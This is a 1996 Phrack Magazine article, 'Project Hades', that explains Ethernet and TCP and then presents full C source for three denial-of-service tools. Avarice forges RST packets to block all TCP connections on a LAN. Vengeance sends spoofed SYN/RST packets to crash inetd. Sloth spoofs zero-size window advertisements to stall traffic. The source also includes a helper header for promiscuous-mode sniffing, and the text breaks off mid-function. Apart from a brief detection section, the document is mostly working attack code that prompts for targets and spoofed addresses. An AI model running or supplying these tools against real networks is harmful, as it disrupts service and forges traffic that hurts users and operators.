[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]


..[ Phrack Magazine ]..
.:: Project Hades: TCP weaknesses ::.

Issues: [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] [ 24 ] [ 25 ] [ 26 ] [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] [ 33 ] [ 34 ] [ 35 ] [ 36 ] [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] [ 42 ] [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] [ 48 ] [ 49 ] [ 50 ] [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ] [ 57 ] [ 58 ] [ 59 ] [ 60 ] [ 61 ] [ 62 ] [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] [ 68 ] [ 69 ] [ 70 ] [ 71 ]
Current issue : #49 | Release date : 1996-11-08 | Editor : daemon9
IntroductionPhrack Staff
Phrack loopbackPhrack Staff
Line NoisePhrack Staff
Phrack Prophile on MudgePhrack Staff
Introduction to Telephony and PBX systemscavalier
Project Loki: ICMP TunnelingAlhambra & daemon9
Project Hades: TCP weaknessesdaemon9
Introduction to CGI and CGI vulnerabilitiesG. Gilliss
Content-Blind CancelbotDr. Dimitri Vulis
A Steganography Improvement Proposalcjm1
South Western Bell Lineman Work CodesIcon
Introduction to the FedLine software systemParmaster
Telephone Company Customer Applicationsvoyager
Smashing The Stack For Fun And ProfitAleph1
TCP port Stealth ScanningUriel
Phrack World Newsdisorder
Title : Project Hades: TCP weaknesses
Author : daemon9
                             .oO Phrack Magazine Oo.

                          Volume Seven, Issue Forty-Nine

                                  File 07 of 16

			        [ Project Hades ]

		           Paper by daemon9 AKA route
		              sourcecode by daemon9
			       for Phrack Magazine
		      October 1996 Guild Productions, kid

	   		comments to [email protected]


		--[ Introduction ]--


	More explorations of weaknesses in the most widely used transport
protocol on the Internet.  Put your mind at rest fearful reader!  The 
vulnerabilities outlined here are nowhere near the devastating nature of 
Project Neptune/Poseidon.  

	Hades is the Greek god of the underworld; his kingdom is that of the 
the Dead.  Hades renown for being quite evil and twisted.  He is also well
known for his TCP exploit code.  Therefore, it seemed fitting to name this
project after him.

	BTW, for this code to work (as with much of my previous code) your 
kernel must be patched to be able to spoof packets.  DO NOT MAIL ME to ask how 
to do it.


		--[ Overview  ]--


	Section I.	Ethernet background information	
	Section II.	TCP background information
	Section III.	Avarice
	Section IV.	Vengeance
	Section V.	Sloth
	Section	VI.	Discussion, Detection, and Prevention

(Note that readers unfamiliar with the TCP/IP protocol suite may wish to first
read ftp://ftp.infonexus.com/pub/Philes/NetTech/TCP-IP/tcipIp.intro.txt.gz)


		Section I.	Ethernet Background information


	Ethernet is a multi-drop, connectionless, unreliable link layer 
protocol.  It (IEEE 802.3 Ethernet is the version I refer to) is the 
link-layer protocol most LANs are based upon.  It is multidrop; each
device on the ethernet shares the media (and, consequently, the bandwidth)
with every other device.  It is connectionless; every frame is sent 
independently of the previous one and next one.  It is unreliable; frames are 
not acknowledged by the other end.  If a frame is received that doesn't pass 
the checksum, it is silently discarded.  It is a link-layer protocol that sits
underneath the network protocol (IP) and above the physical interface (varies,
but often CAT3/5 UTP).


                --[ Signaling and Encoding ]--
		

	Standard 802.3 Ethernet signals at 10 mega-bits per second using 
Manchester encoding to order bits on the wire.  Manchester is a biphase 
state-transition technique; to indicate a particular bit is on, a voltage 
transition from low to high is used.  To indicate a bit is off, a high to low
transition is used.  


                --[ Media Access ]--


	Ethernet uses media contention to gain access to the shared wire.  The
version of contention it uses is CSMA/CD (carrier sense multiple access / 
collision detection).  This simply means that ethernet supports multiple 
devices on a shared network medium.  Any device can send it's data whenever
it thinks the wire is clear.  Collisions are detected (causing back-off and
retry) but not avoided.  CSMA/CD algorithmically:

1. IF: 	 the medium is idle -> transmit.
2. ELSE: the medium is busy -> wait and listen until idle -> transmit.
3. IF:	 collision is detected -> transmit jamming signal, cease all 
	 transmission
4. IF:	 jamming signal is detected -> wait a random amount of time, goto 1
	

		--[ Broadcast Medium ]--


	Since it is CSMA/CD technology, ethernet has the wonderful property
that it hears everything on the network.  Under normal circumstances, an
ethernet NIC will only capture and pass to the network layer packets that 
boast it's own MAC (link-layer) address or a broadcast MAC address.  However, 
it is trivial to place an Ethernet card into promiscuous mode where it will
capture everything it hears, regardless to whom the frame was addressed.

	It bears mentioning that bridges are used to divide an ethernet into
logically separate segments.  A bridge (or bridging device such as a smart 
hub) will not pass an ethernet frame from segment to segment unless the 
addressed host lies on the disparate segment.  This can reduce over-all 
network load by reducing the amount of traffic on the wire.


                Section II.      TCP Background Information


        TCP is a connection-oriented, reliable transport protocol.  TCP is
responsible for hiding network intricacies from the upper layers.  A 
connection-oriented protocol implies that the two hosts participating in a 
discussion must first establish a connection before data may be exchanged.  In
TCP's case, this is done with the three-way handshake.  Reliability can be 
provided in a number of ways, but the only two we are concerned with are data 
sequencing and acknowledgment.  TCP assigns sequence numbers to every byte in
every segment and acknowledges all data bytes received from the other end.  
(ACK's consume a sequence number, but are not themselves ACK'd.  That would be
ludicrous.)  


                --[ TCP Connection Establishment ]--


        In order to exchange data using TCP, hosts must establish a connection.
TCP establishes a connection in a 3 step process called the 3-way handshake.
If machine A is running a client program and wishes to connect to a server
program on machine B, the process is as follows:

                        fig(1)
       
        1       A       ---SYN--->      B       

        2       A    <---SYN/ACK---     B

        3       A       ---ACK--->      B

                                
        At (1) the client is telling the server that it wants a connection.
This is the SYN flag's only purpose.  The client is telling the server that 
the sequence number field is valid, and should be checked.  The client will 
set the sequence number field in the TCP header to it's ISN (initial sequence
number).  The server, upon receiving this segment (2) will respond with it's 
own ISN (therefore the SYN flag is on) and an Acknowledgment of the clients 
first segment (which is the client's ISN+1).  The client then ACK's the 
server's ISN (3).  Now data transfer may take place.


              --[ TCP Control Flags  ]--


        There are six TCP control flags. 

SYN:   Synchronize Sequence Numbers
        The synchronize sequence numbers field is valid.  This flag is only 
valid during the 3-way handshake.  It tells the receiving TCP to check the 
sequence number field, and note it's value as the connection-initiator's 
(usually the client) initial sequence number.  TCP sequence numbers can 
simply be thought of as 32-bit counters.  They range from 0 to 4,294,967,295.
Every byte of data exchanged across a TCP connection (along with certain 
flags) is sequenced.  The sequence number field in the TCP header will contain
the sequence number of the *first* byte of data in the TCP segment.  

ACK:   Acknowledgment
        The acknowledgment number field is valid.  This flag is almost always
set.   The acknowledgment number field in the TCP header holds the value of 
the next *expected* sequence number (from the other side), and also 
acknowledges *all* data (from the other side) up through this ACK number minus
one.

RST:   Reset
        Destroy the referenced connection.  All memory structures are torn 
down.

URG:    Urgent 
        The urgent pointer is valid.  This is TCP's way of implementing out
of band (OOB) data.  For instance, in a telnet connection a `ctrl-c` on the 
client side is considered urgent and will cause this flag to be set. 

PSH:    Push
        The receiving TCP should not queue this data, but rather pass it to 
the application as soon as possible.  This flag should always be set in 
interactive connections, such as telnet and rlogin.

FIN:    Finish 
        The sending TCP is finished transmitting data, but is still open to 
accepting data.


                --[ Ports ]--

       
        To grant simultaneous access to the TCP module, TCP provides a user 
interface called a port.  Ports are used by the kernel to identify network 
processes.  They are strictly transport layer entities.  Together with an 
IP address, a TCP port provides an endpoint for network communications.  In 
fact, at any given moment *all* Internet connections can be described by 4 
numbers: the source IP address and source port and the destination IP 
address and destination port.  Servers are bound to 'well-known' ports so 
that they may be located on a standard port on different systems.  
For example, the telnet daemon sits on TCP port 23.
        

		Section III.	Avarice
	

	Avarice is a SYN,RST generator.  It is designed to disallow any
TCP traffic on the ethernet segment upon which it listens.  It works by
listening for the 3-way handshake procedure to begin, and then immediately 
resetting it.  The result is that no TCP based connections can be negotiated, 
and therefore no TCP traffic can flow.  This version sits on a host, puts the 
NIC into promiscuous mode and listens for connection-establishment requests.
When it hears one, it immediately generates a forged RST packet and sends it 
back to the client.  If the forged RST arrives in time, the client will quit 
with a message like:

	telnet: Unable to connect to remote host: Connection refused

For the client to accept the RST, it must think it is an actual response from
the server.  This requires 3 pieces of information: IP address, TCP port, and 
TCP acknowledgment number.  All of this information is gleaned from the 
original SYN packet:  the IP address of the destination host, the TCP port 
of the listening process, and the clients ISN (the acknowledgment number in 
the RST packet is the clients ISN+1, as SYN's consume a sequence number).

	This program has a wide range of effectiveness.  Speed is essential
for avarice to quell all TCP traffic on a segment.  We are basically racing 
the kernel.  OS kernels tend to be rather efficient at building packets.  If 
run on a fast machine, with a fast kernel, it's kill rate is rather high.  
I have seen kill-rates as high as 98% (occasionally a few slip through) on 
a fast machine.  Consequently, if run on a slow machine, with a slow kernel, it
will likely be useless.  If the RSTs arrive too late, they will be dropped by 
the client, as the ACK number will be too low for the referenced connection.  
Sure, the program could send, say, 10 packets, each with progressively higher 
ACK numbers, but hey, this is a lame program...


		Section IV.	Vengeance


	Vengeance is an inetd killer.  On affected systems this program will
cause inetd to become unstable and die after the next connection attempt.
It sends a connection-request immediately followed by a RST to an internal 
inetd managed service, such as time or daytime.  Inetd is now unstable and
will die after the next attempt at a connection.  Simple.  Dumb.  Not eleet.
(This inetd bug should be fixed or simply not present in newer inetd code.) 

	I did not add code to make the legitimate connection that would kill
inetd to this simple little program for 2 reasons.  1) It's simply not worth 
the complexity to add sequence number prediction to create a spoofed 3-way 
handshake.  This program is too dinky.  2) Maybe the attacker would want 
to leave inetd in a unstable state and let some legitimate user come along and
kill it.  Who knows.  Who cares.  Blah.  I wash my hands of the whole affair.


		Section V.	Sloth


	"Make your ethernet feel like a lagged 28.8 modem link!"

	Sloth is an experiment.  It is an experiment in just how lame IP 
spoofing can get.  It works much the same way avarice does, except it sends 
forged TCP window advertisements.  By default Sloth will spoof zero-size 
window advertisements which will have the effect of slowing interactive 
traffic considerably.  In fact, in some instances, it will freeze a 
connection all together.  This is because when a TCP receives a zero-size 
window advertisement, it will stop sending data, and start sending window 
probes (a window probe is nothing more than an ACK with one byte of 
data) to see if the window size has increased.  Since window probes are, in 
essence, nothing more than acknowledgements, they can get lost.  Because of 
this fact, TCP implements a timer to cordinate the repeated sending of these 
packets.  Window probes are sent according to the persist timer (a 500ms 
timer) which is calculated by TCP's exponential backoff algorithm.  Sloth 
will see each window probe, and spoof a 0-size window to the sender.  This 
all works out to cause mass mayhem, and makes it difficult for either TCP to 
carry on a legitimate conversation.  

	Sloth, like avarice, is only effective on faster machines.  It also
only works well with interactive traffic.

		
		Section	VI.	Discussion, Detection, and Prevention


	Avarice is simply a nasty program.  What more do you want from me?
Detection?  Detection would require an ounce of clue.  Do FTP, SMTP, HTTP, 
POP, telnet, etc all suddenly break at the same time on every machine on 
the LAN?  Could be this program.  Break out the sniffer.  Monitor the network 
and look for the machine that generating the RSTs.  This version of the program
does not spoof its MAC address, so look for that.  To really prevent this 
attack, add cryptographic authentication to the TCP kernels on your machines.

	Vengeance is a wake-up call.  If you haven't patched your inetd to be
resistant to this attack, you should now.  If your vendor hasn't been 
forthcoming with a patch, they should now.  Detection is using this 
program.  Prevention is a patch.  Prevention is disabling the internal inetd 
services.

	Sloth can be detected and dealt with in much the same way as avarice.

	You may have noticed that these programs are named after three of
the Seven Deadly Sins.  You may be wondering if that implies that there will 
be four more programs of similar ilk.  Well, STOP WONDERING.  The answer is 
NO.  I am officially *out* of the D.O.S. business.  I am now putting my efforts
towards more productive ventures.  Next issue, a session jacker.


This project made possible by a grant from the Guild Corporation.


-------------------------------8<-------cut-me-loose--------------------------


/*
                            The Hades Project
		    Explorations in the Weakness of TCP
			   SYN -> RST generator
			        (avarice)
                                 v. 1.0

                        daemon9/route/infinity

                     October 1996 Guild productions

                     comments to [email protected]


   This coding project made possible by a grant from the Guild corporation

*/

#include "lnw.h"

void main(){

	void reset(struct iphdr *,struct tcphdr *,int);

	struct epack{				/* Generic Ethernet packet w/o data payload */
		struct ethhdr eth;		/* Ethernet Header */
		struct iphdr ip;		/* IP header */
		struct tcphdr tcp;		/* TCP header */
	}epack;

	int sock,shoe,dlen;
	struct sockaddr dest;
	struct iphdr  *iphp;
	struct tcphdr *tcphp;

	if(geteuid()||getuid()){
                fprintf(stderr,"UID or EUID of 0 needed...\n");
                exit(0);
        }
	sock=tap(DEVICE);		/* Setup the socket and device */

				/* Could use the SOCK_PACKET but building Ethernet headers would
				 require more time overhead; the kernel can do it quicker then me */
	if((shoe=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
                perror("\nHmmm.... socket problems");
                exit(1);
        }  
	shadow();			/* Run as a daemon */ 
	
	iphp=(struct iphdr *)(((unsigned long)&epack.ip)-2);
  	tcphp=(struct tcphdr *)(((unsigned long)&epack.tcp)-2);   

   	/* Network reading loop / RSTing portion */
	while(1)if(recvfrom(sock,&epack,sizeof(epack),0,&dest,&dlen))if(iphp->protocol==IPPROTO_TCP&&tcphp->syn)reset(iphp,tcphp,shoe);
}


/*
 *	Build a packet and send it off.
 */

void reset(iphp,tcphp,shoe)
struct iphdr *iphp;
struct tcphdr *tcphp;
int shoe;
{
   	
	void dump(struct iphdr *,struct tcphdr *);
        
        struct tpack{			/* Generic TCP packet w/o payload */
                struct iphdr ip;	
                struct tcphdr tcp;
        }tpack;                
        
        struct pseudo_header{           /* For TCP header checksum */
                unsigned source_address;
                unsigned dest_address;
                unsigned char placeholder;
                unsigned char protocol;
                unsigned short tcp_length;
                struct tcphdr tcp;
        }pheader;
  
   	struct sockaddr_in sin;         /* IP address information */
                        		/* Setup the sin struct with addressing information */
      	sin.sin_family=AF_INET;  	/* Internet address family */
        sin.sin_port=tcphp->dest;       /* Source port */
        sin.sin_addr.s_addr=iphp->saddr;/* Dest. address */

                        /* Packet assembly begins here */
        
                                /* Fill in all the TCP header information */

        tpack.tcp.source=tcphp->dest;   /* 16-bit Source port number */
        tpack.tcp.dest=tcphp->source;   /* 16-bit Destination port */
        tpack.tcp.seq=0;        	/* 32-bit Sequence Number */
        tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1);    /* 32-bit Acknowledgement Number */
        tpack.tcp.doff=5;              	/* Data offset */
        tpack.tcp.res1=0;              	/* reserved */
        tpack.tcp.res2=0;              	/* reserved */
      	tpack.tcp.urg=0;               	/* Urgent offset valid flag */
        tpack.tcp.ack=1;               	/* Acknowledgement field valid flag */
        tpack.tcp.psh=0;               	/* Push flag */
        tpack.tcp.rst=1;               	/* Reset flag */
        tpack.tcp.syn=0;               	/* Synchronize sequence numbers flag */
        tpack.tcp.fin=0;               	/* Finish sending flag */
        tpack.tcp.window=0;	 	/* 16-bit Window size */
        tpack.tcp.check=0;             	/* 16-bit checksum (to be filled in below) */
        tpack.tcp.urg_ptr=0;           	/* 16-bit urgent offset */
        
                                /* Fill in all the IP header information */
        
        tpack.ip.version=4;            	/* 4-bit Version */
        tpack.ip.ihl=5;                	/* 4-bit Header Length */
        tpack.ip.tos=0;                	/* 8-bit Type of service */
    	tpack.ip.tot_len=htons(IPHDR+TCPHDR);  /* 16-bit Total length */
        tpack.ip.id=0;         		/* 16-bit ID field */
        tpack.ip.frag_off=0;           	/* 13-bit Fragment offset */
        tpack.ip.ttl=64;	        /* 8-bit Time To Live */
        tpack.ip.protocol=IPPROTO_TCP; 	/* 8-bit Protocol */
        tpack.ip.check=0;              	/* 16-bit Header checksum (filled in below) */
        tpack.ip.saddr=iphp->daddr;    	/* 32-bit Source Address */
        tpack.ip.daddr=iphp->saddr;    	/* 32-bit Destination Address */
        
        pheader.source_address=(unsigned)tpack.ip.saddr;
        pheader.dest_address=(unsigned)tpack.ip.daddr;
        pheader.placeholder=0;
     	pheader.protocol=IPPROTO_TCP;
        pheader.tcp_length=htons(TCPHDR);
        
     			/* IP header checksum */
        
      	tpack.ip.check=in_cksum((unsigned short *)&tpack.ip,IPHDR);
                
			/* TCP header checksum */
                                
        bcopy((char *)&tpack.tcp,(char *)&pheader.tcp,TCPHDR);
       	tpack.tcp.check=in_cksum((unsigned short *)&pheader,TCPHDR+12);

	sendto(shoe,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
#ifndef QUIET
	dump(iphp,tcphp);
#endif
}

/* 
 *	Dumps some info...
 */

void dump(iphp,tcphp)
struct iphdr *iphp;
struct tcphdr *tcphp;
{
	fprintf(stdout,"Connection-establishment Attempt: ");
   	fprintf(stdout,"%s [%d] --> %s [%d]\n",hostLookup(iphp->saddr),ntohs(tcphp->source),hostLookup(iphp->daddr),ntohs(tcphp->dest)); 
	fprintf(stdout,"Thwarting...\n");
}

-------------------------------8<-------cut-me-loose--------------------------

/*
                            The Hades Project
                    Explorations in the Weakness of TCP
                              Inetd Killer
			       (vengance)
                                 v. 1.0

                        daemon9/route/infinity

                     October 1996 Guild productions

                     comments to [email protected]


   This coding project made possible by a grant from the Guild corporation
*/


#include "lnw.h"

void main()
{

	void s3nd(int,int,unsigned,unsigned short,unsigned);
	void usage(char *);
	unsigned nameResolve(char *);	

	int sock,mode,i=0;
	char buf[BUFSIZE];
	unsigned short port;
	unsigned target=0,source=0;
     	char werd[]={"\n\n\n\nHades is a Guild Corporation Production.  c.1996\n\n"}; 

	if(geteuid()||getuid()){
                fprintf(stderr,"UID or EUID of 0 needed...\n");
                exit(0);
        }

	if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
                perror("\nHmmm.... socket problems");
                exit(1);
        }  

	printf(werd);

	printf("\nEnter target address-> ");
        fgets(buf,sizeof(buf)-1,stdin);
	if(!buf[1])exit(0);
        while(buf[i]!='\n')i++;                 /* Strip the newline */
        buf[i]=0;
	target=nameResolve(buf);
        bzero((char *)buf,sizeof(buf));

	printf("\nEnter source address to spoof-> ");
        fgets(buf,sizeof(buf)-1,stdin);
	if(!buf[1])exit(0);        
	while(buf[i]!='\n')i++;                 /* Strip the newline */
        buf[i]=0;
	source=nameResolve(buf);
        bzero((char *)buf,sizeof(buf));

	printf("\nEnter target port (should be 13, 37, or some internal service)-> ");
        fgets(buf,sizeof(buf)-1,stdin);
        if(!buf[1])exit(0);
	port=(unsigned short)atoi(buf);
    
	fprintf(stderr,"Attempting to upset inetd...\n\n");

	s3nd(sock,0,target,port,source);	/* SYN */
	s3nd(sock,1,target,port,source);	/* RST */

	fprintf(stderr,"At this point, if the host is vulnerable, inetd is unstable.\nTo verfiy: `telnet target.com {internal service port #}`.  Do this twice.\nInetd should allow the first connection, but send no data, then die.\nThe second telnet will verify t







his.\n"); 
}

/*
 *	Build a packet and send it off.
 */

void s3nd(int sock,int mode,unsigned target,unsigned short port,unsigned source){
   	
        struct pkt{
                struct iphdr ip;
                struct tcphdr tcp;
        }packet;                
        
        struct pseudo_header{           /* For TCP header checksum */
                unsigned source_address;
                unsigned dest_address;
                unsigned char placeholder;
                unsigned char protocol;
                unsigned short tcp_length;
                struct tcphdr tcp;
        }pseudo_header;
  
   	struct sockaddr_in sin;         /* IP address information */
                        		/* Setup the sin struct with addressing information */
      	sin.sin_family=AF_INET;  	/* Internet address family */
        sin.sin_port=666;       	/* Source port */
        sin.sin_addr.s_addr=target;  	/* Dest. address */

                        /* Packet assembly begins here */
        
                                /* Fill in all the TCP header information */
        
        packet.tcp.source=htons(666);        	/* 16-bit Source port number */
        packet.tcp.dest=htons(port);   		/* 16-bit Destination port */
        if(mode)packet.tcp.seq=0;        	/* 32-bit Sequence Number */
        else packet.tcp.seq=htonl(10241024);
	if(!mode)packet.tcp.ack_seq=0;    	/* 32-bit Acknowledgement Number */
	else packet.tcp.ack_seq=htonl(102410000);
        packet.tcp.doff=5;              	/* Data offset */
        packet.tcp.res1=0;              	/* reserved */
        packet.tcp.res2=0;              	/* reserved */
      	packet.tcp.urg=0;               	/* Urgent offset valid flag */
        packet.tcp.ack=0;               	/* Acknowledgement field valid flag */
        packet.tcp.psh=0;               	/* Push flag */
        if(!mode)packet.tcp.rst=0;               /* Reset flag */
        else packet.tcp.rst=1;
	if(!mode)packet.tcp.syn=1;               /* Synchronize sequence numbers flag */
	else packet.tcp.syn=0;
        packet.tcp.fin=0;               	/* Finish sending flag */
        packet.tcp.window=htons(512);	 	/* 16-bit Window size */
        packet.tcp.check=0;             	/* 16-bit checksum (to be filled in below) */
        packet.tcp.urg_ptr=0;           	/* 16-bit urgent offset */
        
                                /* Fill in all the IP header information */
        
        packet.ip.version=4;            	/* 4-bit Version */
        packet.ip.ihl=5;                	/* 4-bit Header Length */
        packet.ip.tos=0;                	/* 8-bit Type of service */
    	packet.ip.tot_len=htons(IPHDR+TCPHDR);  /* 16-bit Total length */
        packet.ip.id=0;         		/* 16-bit ID field */
        packet.ip.frag_off=0;           	/* 13-bit Fragment offset */
        packet.ip.ttl=64;	              	/* 8-bit Time To Live */
        packet.ip.protocol=IPPROTO_TCP; 	/* 8-bit Protocol */
        packet.ip.check=0;              	/* 16-bit Header checksum (filled in below) */
        packet.ip.saddr=source;           /* 32-bit Source Address */
        packet.ip.daddr=target;           /* 32-bit Destination Address */
        
        pseudo_header.source_address=(unsigned)packet.ip.saddr;
        pseudo_header.dest_address=(unsigned)packet.ip.daddr;
        pseudo_header.placeholder=0;
     	pseudo_header.protocol=IPPROTO_TCP;
        pseudo_header.tcp_length=htons(TCPHDR);
        
     			/* IP header checksum */
        
      	packet.ip.check=in_cksum((unsigned short *)&packet.ip,IPHDR);
                
			/* TCP header checksum */
                                
        bcopy((char *)&packet.tcp,(char *)&pseudo_header.tcp,IPHDR);
       	packet.tcp.check=in_cksum((unsigned short *)&pseudo_header,TCPHDR+12);

	sendto(sock,&packet,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
}

-------------------------------8<-------cut-me-loose--------------------------

/*
                            The Hades Project
                    Explorations in the Weakness of TCP
                          TCP Window Starvation
                                 (sloth)
                                 v. 1.0

                        daemon9/route/infinity

                     October 1996 Guild productions

                     comments to [email protected]


   This coding project made possible by a grant from the Guild corporation

*/


#include "lnw.h"

	/* experiment with this value.  Different things happen with different sizes */

#define SLOTHWINDOW	0

void main(){

	void sl0th(struct iphdr *,struct tcphdr *,int);

	struct epack{				/* Generic Ethernet packet w/o data payload */
		struct ethhdr eth;		/* Ethernet Header */
		struct iphdr ip;		/* IP header */
		struct tcphdr tcp;		/* TCP header */
	}epack;

	int sock,shoe,dlen;
	struct sockaddr dest;
	struct iphdr  *iphp;
	struct tcphdr *tcphp;

	if(geteuid()||getuid()){
                fprintf(stderr,"UID or EUID of 0 needed...\n");
                exit(0);
        }
	sock=tap(DEVICE);		/* Setup the socket and device */

				/* Could use the SOCK_PACKET but building Ethernet headers would
				 require more time overhead; the kernel can do it quicker then me */
	if((shoe=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
                perror("\nHmmm.... socket problems");
                exit(1);
        }  
	shadow();			/* Run as a daemon */	

	iphp=(struct iphdr *)(((unsigned long)&epack.ip)-2);
  	tcphp=(struct tcphdr *)(((unsigned long)&epack.tcp)-2);   

   	/* Network reading loop */
	while(1)if(recvfrom(sock,&epack,sizeof(epack),0,&dest,&dlen))if(iphp->protocol==IPPROTO_TCP&&tcphp->ack)sl0th(iphp,tcphp,shoe);
}


/*
 *	Build a packet and send it off.
 */

void sl0th(iphp,tcphp,shoe)
struct iphdr *iphp;
struct tcphdr *tcphp;
int shoe;
{
   	
	void dump(struct iphdr *,struct tcphdr *);
        
        struct tpack{			/* Generic TCP packet w/o payload */
                struct iphdr ip;	
                struct tcphdr tcp;
        }tpack;                
        
        struct pseudo_header{           /* For TCP header checksum */
                unsigned source_address;
                unsigned dest_address;
                unsigned char placeholder;
                unsigned char protocol;
                unsigned short tcp_length;
                struct tcphdr tcp;
        }pheader;
  
   	struct sockaddr_in sin;         /* IP address information */
                        		/* Setup the sin struct with addressing information */
      	sin.sin_family=AF_INET;  	/* Internet address family */
        sin.sin_port=tcphp->dest;       /* Source port */
        sin.sin_addr.s_addr=iphp->saddr;/* Dest. address */

                        /* Packet assembly begins here */
        
                                /* Fill in all the TCP header information */

        tpack.tcp.source=tcphp->dest;   /* 16-bit Source port number */
        tpack.tcp.dest=tcphp->source;   /* 16-bit Destination port */
        tpack.tcp.seq=htonl(ntohl(tcphp->ack_seq));    /* 32-bit Sequence Number */
        tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq));    /* 32-bit Acknowledgement Number */
        tpack.tcp.doff=5;              	/* Data offset */
        tpack.tcp.res1=0;              	/* reserved */
        tpack.tcp.res2=0;              	/* reserved */
      	tpack.tcp.urg=0;               	/* Urgent offset valid flag */
        tpack.tcp.ack=1;               	/* Acknowledgement field valid flag */
        tpack.tcp.psh=0;               	/* Push flag */
        tpack.tcp.rst=0;               	/* Reset flag */
        tpack.tcp.syn=0;               	/* Synchronize sequence numbers flag */
        tpack.tcp.fin=0;               	/* Finish sending flag */
        tpack.tcp.window=htons(SLOTHWINDOW);	 /* 16-bit Window size */
        tpack.tcp.check=0;             	/* 16-bit checksum (to be filled in below) */
        tpack.tcp.urg_ptr=0;           	/* 16-bit urgent offset */
        
                                /* Fill in all the IP header information */
        
        tpack.ip.version=4;            	/* 4-bit Version */
        tpack.ip.ihl=5;                	/* 4-bit Header Length */
        tpack.ip.tos=0;                	/* 8-bit Type of service */
    	tpack.ip.tot_len=htons(IPHDR+TCPHDR);  /* 16-bit Total length */
        tpack.ip.id=0;         		/* 16-bit ID field */
        tpack.ip.frag_off=0;           	/* 13-bit Fragment offset */
        tpack.ip.ttl=64;	        /* 8-bit Time To Live */
        tpack.ip.protocol=IPPROTO_TCP; 	/* 8-bit Protocol */
        tpack.ip.check=0;              	/* 16-bit Header checksum (filled in below) */
        tpack.ip.saddr=iphp->daddr;    	/* 32-bit Source Address */
        tpack.ip.daddr=iphp->saddr;    	/* 32-bit Destination Address */
        
        pheader.source_address=(unsigned)tpack.ip.saddr;
        pheader.dest_address=(unsigned)tpack.ip.daddr;
        pheader.placeholder=0;
     	pheader.protocol=IPPROTO_TCP;
        pheader.tcp_length=htons(TCPHDR);
        
     			/* IP header checksum */
        
      	tpack.ip.check=in_cksum((unsigned short *)&tpack.ip,IPHDR);
                
			/* TCP header checksum */
                                
        bcopy((char *)&tpack.tcp,(char *)&pheader.tcp,TCPHDR);
       	tpack.tcp.check=in_cksum((unsigned short *)&pheader,TCPHDR+12);

	sendto(shoe,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
#ifndef QUIET
	dump(iphp,tcphp);
#endif
}

/* 
 *	Dumps some info...
 */

void dump(iphp,tcphp)
struct iphdr *iphp;
struct tcphdr *tcphp;
{
	fprintf(stdout,"Hmm... I smell an ACK: ");
   	fprintf(stdout,"%s [%d] --> %s [%d]\n",hostLookup(iphp->saddr),ntohs(tcphp->source),hostLookup(iphp->daddr),ntohs(tcphp->dest)); 
	fprintf(stdout,"let's slow things down a bit\n");
}


-------------------------------8<-------cut-me-loose--------------------------


/*
		Basic Linux Networking Header Information. v1.0

   		   c. daemon9, Guild Corporation 1996

Includes:

	tap
	in_cksum
	nameResolve
	hostLookup	
	shadow
	reaper

	This is beta.  Expect it to expand greatly the next time around ...
	Sources from all over the map.

		code from:
			route
			halflife
*/

#include <string.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <syslog.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <linux/socket.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/if_ether.h>
#include <linux/if.h>

#define DEVICE 		"eth0"
#define BUFSIZE 	256
#define ETHHDR 		14
#define TCPHDR 		20
#define IPHDR  		20
#define ICMPHDR 	8


/*
 *      IP address into network byte order
 */
                 
unsigned nameResolve(char *hostname){
        
        struct in_addr addr;
        struct hostent *hostEnt; 
   
        if((addr.s_addr=inet_addr(hostname))==-1){
                if(!(hostEnt=gethostbyname(hostname))){
                        fprintf(stderr,"Name lookup failure: `%s`\n",hostname);
                        exit(0);
                }
                bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
        }
        return addr.s_addr;
}
 
/*
 *      IP Family checksum routine
 */

unsigned short in_cksum(unsigned short *ptr,int nbytes){
                        
        register long           sum;            /* assumes long == 32 bits */
        u_short                 oddbyte;
        register u_short        answer;         /* assumes u_short == 16 bits */
                        
        /*
         * Our algorithm is simple, using a 32-bit accumulator (sum),
         * we add sequential 16-bit words to it, and at the end, fold back 
         * all the carry bits from the top 16 bits into the lower 16 bits. 
         */
        
        sum = 0;
        while (nbytes > 1)  {
                sum += *ptr++;
                nbytes -= 2;    
        }
                        
                                /* mop up an odd byte, if necessary */
        if (nbytes == 1) {
                oddbyte = 0;            /* make sure top half is zero */
                *((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */
                sum += oddbyte;
        }               
  
        /*
         * Add back carry outs from top 16 bits to low 16 bits.
         */
         
        sum  = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */
        sum += (sum >> 16);                     /* add carry */
        answer = ~sum;          /* ones-complement, then truncate to 16 bits */
        return(answer);
}


/*
 *	Creates a low level raw-packet socket and puts the device into promiscuous mode.
 */

int tap(device)
char *device;
{
	
	int fd;				/* File descriptor */
   	struct ifreq ifr;		/* Link-layer interface request structure */
					/* Ethernet code for IP 0x800==ETH_P_IP */
   	if((fd=socket(AF_INET,SOCK_PACKET,htons(ETH_P_IP)))<0){	/* Linux's way of */ 
